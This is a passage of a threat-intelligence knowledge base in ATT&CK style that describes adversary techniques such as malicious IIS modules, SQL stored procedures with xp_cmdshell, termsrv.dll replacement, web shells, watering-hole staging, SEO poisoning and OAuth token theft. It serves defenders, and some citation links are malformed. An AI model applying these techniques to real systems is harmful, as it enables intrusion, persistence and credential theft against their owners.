Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports <code>RegisterModule</code>, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.<sup>[[Microsoft IIS Modules Overview 2007](https://app.tidalcyber.com/references/c8db6bfd-3a08-43b3-b33b-91a32e9bd694)]</sup><sup>[[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)]</sup><sup>[[ESET IIS Malware 2021](https://app.tidalcyber.com/references/d9c6e55b-39b7-4097-8ab2-8b87421ce2f4)]</sup>

The tag is: misp-galaxy:technique="IIS Components"

SQL Stored Procedures

Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).

Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.<sup>[[NetSPI Startup Stored Procedures](https://app.tidalcyber.com/references/afe89472-ac42-4a0d-b398-5ed6a5dee74f)]</sup><sup>[[Kaspersky MSSQL Aug 2019](https://app.tidalcyber.com/references/569a6be3-7a10-4aa4-be26-a62ed562a4ce)]</sup> To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.<sup>[[NetSPI Startup Stored Procedures](https://app.tidalcyber.com/references/afe89472-ac42-4a0d-b398-5ed6a5dee74f)]</sup><sup>[[Kaspersky MSSQL Aug 2019](https://app.tidalcyber.com/references/569a6be3-7a10-4aa4-be26-a62ed562a4ce)]</sup><sup>[[Microsoft xp_cmdshell 2017](https://app.tidalcyber.com/references/1945b8b2-de29-4f7a-8957-cc96fbad3b11)]</sup>

Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).<sup>[[Microsoft CLR Integration 2017](https://app.tidalcyber.com/references/83fc7522-5eb1-4710-8391-090389948686)]</sup> Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.<sup>[[NetSPI SQL Server CLR](https://app.tidalcyber.com/references/6f3d8c89-9d5d-4754-98d5-44fe3a5dd0d5)]</sup>

The tag is: misp-galaxy:technique="SQL Stored Procedures"

Terminal Services DLL

Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.<sup>[[Microsoft Remote Desktop Services](https://app.tidalcyber.com/references/a981e013-f839-46e9-9c8a-128c4897f77a)]</sup>

[Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service’s DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.<sup>[[Microsoft System Services Fundamentals](https://app.tidalcyber.com/references/25d54a16-59a0-497d-a4a5-021420da8f1c)]</sup> The <code>termsrv.dll</code> file, typically stored in %SystemRoot%\System32\, is the default <code>ServiceDll</code> value for Terminal Services in HKLM\System\CurrentControlSet\services\TermService\Parameters\.

Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.<sup>[[James TermServ DLL](https://app.tidalcyber.com/references/5a9e4f0f-83d6-4f18-a358-a9ad450c2734)]</sup> Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.<sup>[[Windows OS Hub RDP](https://app.tidalcyber.com/references/335480f8-8f40-4da7-b083-6a4b158496c1)]</sup><sup>[[RDPWrap Github](https://app.tidalcyber.com/references/777a0a6f-3684-4888-ae1b-adc386be763a)]</sup> On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.

The tag is: misp-galaxy:technique="Terminal Services DLL"

Transport Agent

Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.<sup>[[Microsoft TransportAgent Jun 2016](https://app.tidalcyber.com/references/16ae3e7e-5f0d-4ca9-8453-be960b2111b6)]</sup><sup>[[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)]</sup> Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.

Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.<sup>[[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)]</sup> Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.

The tag is: misp-galaxy:technique="Transport Agent"

Web Shell

Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup>

In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://app.tidalcyber.com/software/723c5ab7-23ca-46f2-83bb-f1d1e550122c) Web shell client).<sup>[[Lee 2013](https://app.tidalcyber.com/references/6d1e2b0a-fed2-490b-be25-6580dfb7d6aa)]</sup>

The tag is: misp-galaxy:technique="Web Shell"

Server Software Component

Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup>

The tag is: misp-galaxy:technique="Server Software Component"

Service Stop

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary’s overall objectives to cause damage to the environment.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup>

Adversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible <sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup>. In some cases, adversaries may stop or disable many or all services to render systems unusable.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) or [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) on the data stores of services like Exchange and SQL Server.<sup>[[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]</sup>

The tag is: misp-galaxy:technique="Service Stop"

Shared Modules

Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)).

Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.

The Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in dlfcn.h in functions such as dlopen and dlsym. Although macOS can execute .so files, common practice uses .dylib files.<sup>[[Apple Dev Dynamic Libraries](https://app.tidalcyber.com/references/39ffd162-4052-57ec-bd20-2fe6b8e6beab)]</sup><sup>[[Linux Shared Libraries](https://app.tidalcyber.com/references/054d769a-f88e-55e9-971a-f169ee434cfe)]</sup><sup>[[RotaJakiro 2021 netlab360 analysis](https://app.tidalcyber.com/references/7a9c53dd-2c0e-5452-9ee2-01531fbf8ba8)]</sup><sup>[[Unit42 OceanLotus 2017](https://app.tidalcyber.com/references/fcaf57f1-6696-54a5-a78c-255c8f6ac235)]</sup>

The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) which is called from functions like LoadLibrary at run time.<sup>[[Microsoft DLL](https://app.tidalcyber.com/references/f0ae2788-537c-5644-ba1b-d06a612e73c1)]</sup>

The tag is: misp-galaxy:technique="Shared Modules"

Software Deployment Tools

Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).

Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. Network infrastructure may also have administration tools that can be similarly abused by adversaries. <sup>[[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation](https://app.tidalcyber.com/references/a43dd8ce-23d6-5768-8522-6973dc45e1ac)]</sup>

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it’s intended purpose.

The tag is: misp-galaxy:technique="Software Deployment Tools"

Security Software Discovery

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Example commands that can be used to obtain security software information are [netsh](https://app.tidalcyber.com/software/803192b8-747b-4108-ae15-2d7481d39162), <code>reg query</code> with [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532), <code>dir</code> with [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8), and [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup> For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the <code>DescribeSecurityGroups</code> action with various request parameters. <sup>[[DescribeSecurityGroups - Amazon Elastic Compute Cloud](https://app.tidalcyber.com/references/aa953df5-40b5-42d2-9e33-a227a093497f)]</sup>

The tag is: misp-galaxy:technique="Security Software Discovery"

Software Discovery

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).

The tag is: misp-galaxy:technique="Software Discovery"

Drive-by Target

Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381). In such cases, the user’s web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc). Prior to [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or previously compromised ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)).

Adversaries may upload or inject malicious web content, such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc), into websites.<sup>[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)]</sup><sup>[[Gallagher 2015](https://app.tidalcyber.com/references/b1540c5c-0bbc-4b9d-9185-fae224ba31be)]</sup> This may be done in a number of ways, including:

  • Inserting malicious scripts into web pages or other user controllable web content such as forum posts

  • Modifying script files served to websites from publicly writeable cloud storage buckets

  • Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://app.tidalcyber.com/technique/60ac24aa-ce63-5c1d-8126-db20a27d85be))

In addition to staging content to exploit a user’s web browser, adversaries may also stage scripting content to profile the user’s browser (as in [Gather Victim Host Information](https://app.tidalcyber.com/technique/4acf57da-73c1-4555-a86a-38ea4a8b962d)) to ensure it is vulnerable prior to attempting exploitation.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup>

Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to help facilitate [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381).

The tag is: misp-galaxy:technique="Drive-by Target"

Install Digital Certificate

Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.<sup>[[DigiCert Install SSL Cert](https://app.tidalcyber.com/references/a1d7d368-6092-4421-99de-44e458deee21)]</sup>

Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers.

Adversaries can obtain digital certificates (see [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58)) or create self-signed certificates (see [Digital Certificates](https://app.tidalcyber.com/technique/5bcbb0c5-7061-481f-a677-09028a6c59f7)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or previously compromised ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)).

The tag is: misp-galaxy:technique="Install Digital Certificate"

Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://app.tidalcyber.com/technique/46f60fff-71a1-4cfd-b639-71a0ac903bbb). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://app.tidalcyber.com/technique/4a68c72c-79c1-4fed-9107-75bb5b06dfc3)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d)), an adversary must set up the resources for a link target for the spearphishing link.

Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link]([Malwarebytes Silent Librarian October 2020(https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup><sup>[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]</sup> Adversaries may also [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe) and have the link target point to malware for download/execution by the user.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to help facilitate [Malicious Link](https://app.tidalcyber.com/technique/46f60fff-71a1-4cfd-b639-71a0ac903bbb). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.<sup>[[Netskope GCP Redirection](https://app.tidalcyber.com/references/18efeffc-c47b-46ad-8e7b-2eda30a406f0)]</sup><sup>[[Netskope Cloud Phishing](https://app.tidalcyber.com/references/25d46bc1-4c05-48d3-95f0-aa3ee1100bf9)]</sup><sup>[[Intezer App Service Phishing](https://app.tidalcyber.com/references/e86abbd9-f349-4d90-8ec9-899fe1637f94)]</sup> Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.<sup>[[Talos IPFS 2022](https://app.tidalcyber.com/references/dc98c7ce-0a3f-5f35-9885-6c1c73e5858d)]</sup>

The tag is: misp-galaxy:technique="Link Target"

SEO Poisoning

Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.<sup>[[Atlas SEO](https://app.tidalcyber.com/references/26d7134e-7b93-4aa1-a859-03cf964ca1b5)]</sup><sup>[[MalwareBytes SEO](https://app.tidalcyber.com/references/250b09a2-dd97-4fbf-af2f-618d1f126957)]</sup>

To help facilitate [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).<sup>[[ZScaler SEO](https://app.tidalcyber.com/references/f117cfa5-1bad-43ae-9eaa-3b9123061f93)]</sup><sup>[[Atlas SEO](https://app.tidalcyber.com/references/26d7134e-7b93-4aa1-a859-03cf964ca1b5)]</sup>

Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.<sup>[[MalwareBytes SEO](https://app.tidalcyber.com/references/250b09a2-dd97-4fbf-af2f-618d1f126957)]</sup><sup>[[DFIR Report Gootloader](https://app.tidalcyber.com/references/aa12dc30-ba81-46c5-b412-ca4a01e72d7f)]</sup>

SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.<sup>[[ZScaler SEO](https://app.tidalcyber.com/references/f117cfa5-1bad-43ae-9eaa-3b9123061f93)]</sup><sup>[[Sophos Gootloader](https://app.tidalcyber.com/references/63357292-0f08-4405-a45a-34b606ab7110)]</sup>

The tag is: misp-galaxy:technique="SEO Poisoning"

Upload Malware

Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) by placing it on an Internet accessible web server.

Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup><sup>[[Talos IPFS 2022](https://app.tidalcyber.com/references/dc98c7ce-0a3f-5f35-9885-6c1c73e5858d)]</sup>

Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) may increase the chance of users mistakenly executing these files.

The tag is: misp-galaxy:technique="Upload Malware"

Upload Tool

Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) by placing it on an Internet accessible web server.

Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure]([Dell TG-3390(https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup> Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.<sup>[[Dragos Heroku Watering Hole](https://app.tidalcyber.com/references/8768909c-f511-4067-9a97-6f7dee24f276)]</sup><sup>[[Malwarebytes Heroku Skimmers](https://app.tidalcyber.com/references/4656cc2c-aff3-4416-b18d-995876d37e06)]</sup><sup>[[Intezer App Service Phishing](https://app.tidalcyber.com/references/e86abbd9-f349-4d90-8ec9-899fe1637f94)]</sup>

Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.

The tag is: misp-galaxy:technique="Upload Tool"

Stage Capabilities

Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70)) or obtained ([Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup><sup>[[Dragos Heroku Watering Hole](https://app.tidalcyber.com/references/8768909c-f511-4067-9a97-6f7dee24f276)]</sup><sup>[[Malwarebytes Heroku Skimmers](https://app.tidalcyber.com/references/4656cc2c-aff3-4416-b18d-995876d37e06)]</sup><sup>[[Netskope GCP Redirection](https://app.tidalcyber.com/references/18efeffc-c47b-46ad-8e7b-2eda30a406f0)]</sup><sup>[[Netskope Cloud Phishing](https://app.tidalcyber.com/references/25d46bc1-4c05-48d3-95f0-aa3ee1100bf9)]</sup>

Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):

The tag is: misp-galaxy:technique="Stage Capabilities"

Steal Application Access Token

Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).<sup>[[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019](https://app.tidalcyber.com/references/8ec52402-7e54-463d-8906-f373e5855018)]</sup> OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.

In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.<sup>[[Kubernetes Service Accounts](https://app.tidalcyber.com/references/a74ffa28-8a2e-4bfd-bc66-969b463bebd9)]</sup>

Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft’s Authorization Code Grant flow.<sup>[[Microsoft Identity Platform Protocols May 2019](https://app.tidalcyber.com/references/a99d2292-be39-4e55-a952-30c9d6a3d0a3)]</sup><sup>[[Microsoft - OAuth Code Authorization flow - June 2019](https://app.tidalcyber.com/references/a41c2123-8b8d-4f98-a535-e58e3e746b69)]</sup> An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.

Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user’s OAuth token.<sup>[[Amnesty OAuth Phishing Attacks, August 2019](https://app.tidalcyber.com/references/0b0f9cf6-f0af-4f86-9699-a63ff36c49e2)]</sup><sup>[[Trend Micro Pawn Storm OAuth 2017](https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)]</sup> The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.<sup>[[Microsoft - Azure AD App Registration - May 2019](https://app.tidalcyber.com/references/36a06c99-55ca-4163-9450-c3b84ae10039)]</sup> Then, they can send a [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token]([Microsoft - Azure AD Identity Tokens - Aug 2019(https://app.tidalcyber.com/references/44767d53-8cd7-44dd-a69d-8a7bebc1d87d)]</sup>

Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens<sup>[[Auth0 Understanding Refresh Tokens](https://app.tidalcyber.com/references/84eb3d8a-f6b1-4bb5-9411-2c8da29b5946)]</sup>, allowing them to obtain new access tokens without prompting the user.

The tag is: misp-galaxy:technique="Steal Application Access Token"

Steal or Forge Authentication Certificates

Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.<sup>[[O365 Blog Azure AD Device IDs](https://app.tidalcyber.com/references/ec94c043-92ef-4691-b21a-7ea68f39e338)]</sup><sup>[[Microsoft AD CS Overview](https://app.tidalcyber.com/references/f1b2526a-1bf6-4954-a9b3-a5e008761ceb)]</sup>

